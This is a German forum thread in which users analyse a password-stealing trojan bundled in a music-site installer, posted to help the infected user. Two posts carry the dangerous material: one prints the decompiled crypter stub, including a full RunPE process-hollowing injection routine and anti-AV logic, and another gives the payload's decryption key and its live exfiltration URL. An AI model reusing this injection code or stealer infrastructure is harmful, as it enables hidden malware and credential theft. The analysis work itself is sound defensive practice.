#1 18. Februar 2011 Zuletzt von einem Moderator bearbeitet: 14. April 2017 okay scheinbar kann man nichma mehr seiner lieblings music seite vertrauen jedenfalls heut mit adminrechten ausgeführt, is ja normal bei installationen, hab mich über die bin files gewundert die nur als deko da waren ich hab win7 64bit Antivirus scan for 41dc79c0b1fb809cc4dcd00b7870d1d33dbf399120dc5bfe23f4aeee1e2d4ce9 at 2011-02-17 23:59:07 UTC - VirusTotal Code: Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 01:20:05, on 18.02.2011 Platform: Windows 7 (WinNT 6.00.3504) MSIE: Internet Explorer v8.00 (8.00.7600.16722) Boot mode: Normal Running processes: C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe C:\Program Files (x86)\Trillian\trillian.exe C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe C:\Program Files (x86)\DivX\DivX Plus Web Player\DDMService.exe C:\Program Files (x86)\xchat\xchat.exe C:\Program Files (x86)\Last.fm\LastFM.exe C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWTray.exe C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe C:\Users\****\Downloads\HiJackThis204.exe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = F2 - REG:system.ini: UserInit=userinit.exe O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll O2 - BHO: Use the DivX Plus Web Player to watch web videos with less interruptions and smoother playback on supported sites - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\Microsoft Office\Office14\GROOVEEX.DLL O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\Microsoft Office\Office14\URLREDIR.DLL O2 - BHO: Ask Toolbar BHO - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll O2 - BHO: Microsoft-Webtestaufzeichnung 10.0-Hilfsprogramm - {DDA57003-0068-4ed2-9D32-4D1EC707D94D} - C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll O3 - Toolbar: Foxit Toolbar - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun O4 - Startup: Trillian.lnk = C:\Program Files (x86)\Trillian\trillian.exe O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\Microsoft Office\Office14\EXCEL.EXE/3000 O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~2\Microsoft Office\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\Microsoft Office\Office14\ONBttnIE.dll/105 O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll O9 - Extra button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll O9 - Extra 'Tools' menuitem: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\Microsoft Office\OFFICE11\REFIEBAR.DLL O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\Skype4COM.dll O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing) O23 - Service: Ati External Event Utility - Unknown owner - C:\Windows\system32\Ati2evxx.exe (file missing) O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing) O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing) O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe O23 - Service: FLEXnet Licensing Service 64 - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe O23 - Service: LogMeIn Hamachi 2.0 Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe O23 - Service: HASP License Manager (hasplms) - Unknown owner - C:\Windows\system32\hasplms.exe (file missing) O23 - Service: HTTP Debugger (HTTPDebugger) - MadeForNet.com - C:\Program Files (x86)\HTTP Debugger Pro\mfnsvc.exe O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: KMService - Unknown owner - C:\Windows\system32\srvany.exe O23 - Service: Lavasoft Ad-Aware Service - Lavasoft Limited - C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWService.exe O23 - Service: Process Monitor (LVPrcS64) - Logitech Inc. - C:\Program Files\Common Files\Logishrd\LVMVFM\LVPrcSrv.exe O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files (x86)\McAfee Security Scan\2.0.181\McCHSvc.exe O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 32-bit 32-bit (mi-raysat_3dsmax2011_32) - Unknown owner - C:\Program Files (x86)\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_32server.exe O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 64-bit 64-bit (mi-raysat_3dsmax2011_64) - Unknown owner - C:\Program Files\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_64server.exe O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing) O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: NIHardwareService - Native Instruments GmbH - C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe O23 - Service: PACE License Services (PaceLicenseDServices) - PACE Anti-Piracy, Inc. - C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: Sage Registry Service (Registry) - Sage KHK Software - C:\Program Files (x86)\Common Files\Sage KHK Shared\REGISTRY.EXE O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing) O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing) O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing) O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing) O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing) O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing) O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing) O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing) O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing) O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing) -- End of file - 11312 bytes besagte exe No File | www.xup.in + Multi-Zitat Zitieren
#2 18. Februar 2011 AW: was ist es was tut es? VM an -> Wireshark an -> Setup.exe ausfuehren -> Geaenderte Dateien anschauen -> Wireshark log anschauen -> [was ist es was tut es] (ein debugger waere auch ganz praktisch, benoetigt aber vorkentnisse -> codeanalyse) mfg PS: Ich wuerde meinen Accountnamen aus dem Log entfernen.. PS2: Der Autor ist uebrigens bei hackforums.net angemeldet, jedenfalls klaut er da seinen Code zusammen.. //edit: Log sieht sauber aus. Code Injection into avcenter.exe Autostart via Registry SOFTWARE\Microsoft\Windows\CurrentVersion\Run (\temp.exe?) "Crypted" via 10$ BlackBloodCrypter2.2 und Base64^^ ... + Multi-Zitat Zitieren
#3 18. Februar 2011 AW: was ist es was tut es? hab keine temp.exe laut olydbgkillt es erstma die avs, naja mal in der vm runen lassen, es hantiert mit 3 datein rum laut sandboxie unter xp vm gehts nedma vm win7 öffnet den explorer, hinterlässt nix im windir oder autostart keine daten fließen,. grad mit wire gesnifft, crazy ding + Multi-Zitat Zitieren
#4 18. Februar 2011 AW: was ist es was tut es? Da wurde ein Copy/Paste Kiddie Crypter verwendet... lohnt sich nicht wirklich Wireshark zu starten, guckt euch doch einfach den Sourcecode an: Code: public static void Main() { ResourceManager manager = new ResourceManager("TempRes", Assembly.GetExecutingAssembly()); byte[] inArray = (byte[]) manager.GetObject("crypted"); string newValue = manager.GetString("settings"); BindedData = manager.GetString("bind"); RunPE = manager.GetString("runpe"); char ch = '%'; string[] strArray = newValue.Split(new char[] { ch }); string str8 = strArray[4]; string str2 = strArray[5]; string str = strArray[3]; string str6 = strArray[11]; string str4 = strArray[6]; string str3 = strArray[10]; string str5 = strArray[12]; if (str3 == "1") { OnlineSub(); //checked ob internet an ist } if (str == "1") { Daanteys.Enable(); //anti av/vm/sandbox } if (str2 == "1") { Thread thread = new Thread(new ThreadStart(Stub.BindSub)); thread.IsBackground = true; thread.Start(); } if (str8 == "1") { AddStartUp(); } RunPE = RunPE.Replace("%%CDATA%%", CD.format(Convert.ToBase64String(inArray))); //der eigentliche Schädling RunPE = RunPE.Replace("%%Settings%%", newValue); if (str5 == "DefBrw") { str5 = defaultbrowser(); } RunPE = RunPE.Replace("%%INJECT%%", str5); Execute(RunPE); //im Speicher ausführen if (str4 == "1") { switch (strArray[7]) { case "": Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]); goto Label_023D; case "Exclamation": Interaction.MsgBox(strArray[8], MsgBoxStyle.Exclamation, strArray[9]); goto Label_023D; case "Critical": Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]); goto Label_023D; case "Question": Interaction.MsgBox(strArray[8], MsgBoxStyle.Question, strArray[9]); break; case "Information": Interaction.MsgBox(strArray[8], MsgBoxStyle.Information, strArray[9]); break; } } Label_023D: if (str6 == "1") { MeltME(); //sich selber löschen } } Die Settings sind die folgenden: Code: 9%AES%cFwmeodjIGLViDo%0%0%0%0%Critical%%%0%0%explorer.exe% Die Methode, die das eigentlich schädliche Programm ausführt, wird on-the-fly compiled und der Source sieht so aus: Code: Imports System.Text Imports System.Runtime.InteropServices Imports System Imports Microsoft.VisualBasic Imports System.ComponentModel Imports System.IO.Compression Imports System.IO Namespace Inject Public Class RunPE Public Shared Function DoStuff() As Boolean Dim Setting As String = "%%Settings%%" Dim FileSplit As Char = "%%BlackBloodCrypter2.2%%" Dim SplitedData() as String = Setting.Split(FileSplit) Dim Password As String = SplitedData(2) Dim Encryption As String = SplitedData(1) Dim CryptData As String = %%CDATA%% Dim InjectInto as String = "%%INJECT%%" If Environment.OSVersion.Platform.ToString.Contains("32") OrElse Environment.OSVersion.Platform.ToString.Contains("86") Then If Encryption = "RC4" Then InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto) ElseIf Encryption = "AES" Then InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto) ElseIf Encryption = "DES" Then InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto) ElseIf Encryption = "RC2" Then InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto) ElseIf Encryption = "STR" Then InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto) ElseIf Encryption = "TDES" Then InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto) End If Else If Encryption = "RC4" Then InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe") ElseIf Encryption = "AES" Then InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe") ElseIf Encryption = "DES" Then InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe") ElseIf Encryption = "RC2" Then InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe") ElseIf Encryption = "STR" Then InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe") ElseIf Encryption = "TDES" Then InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe") End If End If Return True End Function Public Shared Function AES_Decrypt(ByVal input As Byte(), ByVal pass As Byte()) As Byte() Dim AES As New System.Security.Cryptography.RijndaelManaged Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider Dim decrypted() As Byte Try Dim hash(31) As Byte Dim temp As Byte() = Hash_AES.ComputeHash(pass) Array.Copy(temp, 0, hash, 0, 16) Array.Copy(temp, 0, hash, 15, 16) AES.Key = hash AES.Mode = Security.Cryptography.CipherMode.ECB Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor Dim Buffer As Byte() = input decrypted = DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length) Return decrypted Catch ex As Exception Return Nothing End Try End Function ..... <DllImport("kernel32")> _ Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _ ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean End Function <DllImport("kernel32")> _ Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean End Function <DllImport("ntdll")> _ Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger End Function <DllImport("kernel32")> _ Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean End Function <DllImport("kernel32.dll")> _ Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger End Function Declare Function usegfsuiefgseuf Lib "kernel32" Alias "SetThreadContext" (ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean <DllImport("kernel32")> _ Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr End Function <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _ Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean End Function <DllImport("kernel32.dll", SetLastError:=True)> _ Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean End Function Public Shared Function InjectPE(ByVal bytes() as Byte, ByVal InjectInto as String) As Boolean Try Dim procAttr As IntPtr = IntPtr.Zero Dim processInfo As IntPtr() = New IntPtr(3) {} Dim startupInfo As Byte() = New Byte(67) {} Dim num2 As Integer = BitConverter.ToInt32(bytes, 60) Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6) Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54)) If CreateProcess(Nothing, New StringBuilder(InjectInto), procAttr, procAttr, False, 4, _ procAttr, Nothing, startupInfo, processInfo) Then Dim ctxt As UInteger() = New UInteger(178) {} ctxt(0) = &H10002 If GetThreadContext(processInfo(1), ctxt) Then Dim baseAddr As New IntPtr(ctxt(&H29) + 8L) Dim buffer__1 As IntPtr = IntPtr.Zero Dim bufferSize As New IntPtr(4) Dim numRead As IntPtr = IntPtr.Zero If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34)) Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80)) Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40) Dim lpNumberOfBytesWritten As Integer WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten) Dim num5 As Integer = num - 1 For i As Integer = 0 To num5 Dim dst As Integer() = New Integer(9) {} Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40) Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {} Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length) addr = New IntPtr(buffer2.Length) size = New IntPtr(lpBaseAddress.ToInt32() + dst(3)) WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten) Next size = New IntPtr(ctxt(&H29) + 8L) addr = New IntPtr(4) WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten) ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40)) usegfsuiefgseuf(processInfo(1), ctxt) End If End If ResumeThread(processInfo(1)) End If Catch Return False End Try Return True End Function Interessant ist es eben in welche exe es injected wird, sieht man aber gut im Quellcode... Wie kommt man nun auf elegantem Wege an den Schädling? Ganz einfach, die entscheidende Methode (AES Decrypt) kopieren, in Visual Studio rein und die exe decrypten mit dem gegebenen Passwort... Hmpf, für den eigentlichen Schädling hat es kein Platz mehr -> RR Post Zeichenlimit :lol: + Multi-Zitat Zitieren
#5 18. Februar 2011 AW: was ist es was tut es? ich bin irgendwie grad zu blöd dafür, was macht/hat es gemacht es nu bzw wie werd ich es wieder los + Multi-Zitat Zitieren
#6 18. Februar 2011 AW: was ist es was tut es? decrypt methode in C#: Code: static void Main(string[] args) { string pathInput = @"C:\Users\Admin\Downloads\crypted"; string pathOutput = @"C:\Users\Admin\Downloads\crypted.exe"; string password = "cFwmeodjIGLViDo"; BinaryReader b = new BinaryReader(File.Open(pathInput, FileMode.Open)); byte[] buffer = b.ReadBytes((int)b.BaseStream.Length); b.Close(); RijndaelManaged rj = new RijndaelManaged(); MD5CryptoServiceProvider crp = new MD5CryptoServiceProvider(); byte[] hash = crp.ComputeHash(Encoding.Default.GetBytes(password)); byte[] hashpw = new byte[32]; Array.Copy(hash, 0, hashpw, 0, 16); Array.Copy(hash, 0, hashpw, 15, 16); rj.Key = hashpw; rj.Mode = CipherMode.ECB; ICryptoTransform transform = rj.CreateDecryptor(); byte[] decrypted = null; try { decrypted = transform.TransformFinalBlock(buffer, 0, buffer.Length); } catch (CryptographicException ex) { Console.WriteLine(ex.ToString()); Console.Read(); } BinaryWriter writeBinay = new BinaryWriter(new FileStream(pathOutput, FileMode.Create)); writeBinay.Write(decrypted); writeBinay.Close(); } decrypted exe virus total scan: Antivirus scan for 26bb9902c8cf721300929c7d967dc989b736d4572fbca8fa607eb5e11fd5daac at 2011-02-18 19:46:34 UTC - VirusTotal Auf die schnelle würde ich sagen: Da ist ein sehr guter Passwort Stealer (Baukasten!) drin. Die Daten werden an ein PHP Script geschickt: Code: http://46.182.124.42/index2.php Der Stealer erkennt auch ob Wireshark läuft! Nistet sich wohl nicht ins System ein, aber z.B. deine Firefox Passwörter sind nun beim Kiddie. Such trotzdem mal deine Autostart Liste ab mit Autoruns von Sysinternals. + Multi-Zitat Zitieren
#8 19. Februar 2011 AW: Win32.Trojan-Downloader.MSIL.Agent.xf.3.a jo dann sollte dein System schon sauber sein. Hier nochmal ne kurze Auflistung was es so klaut: - FlashFXP/SmartFTP - Opera/Firefox/Chrome/IE - MSN/Trillian - Steam Die Liste ist nicht vollständig, besonders FlashFXP dürfte dich aber interessieren^^ + Multi-Zitat Zitieren
#9 19. Februar 2011 AW: Win32.Trojan-Downloader.MSIL.Agent.xf.3.a naja mit den ftp daten kanner nix anfangen icq is schon geändert zumindest die uin wo ich das pw selbst weiß trillian astra bietet ja nedma die option das pw zu ändern, toller service... aber danke für die auflistung + Multi-Zitat Zitieren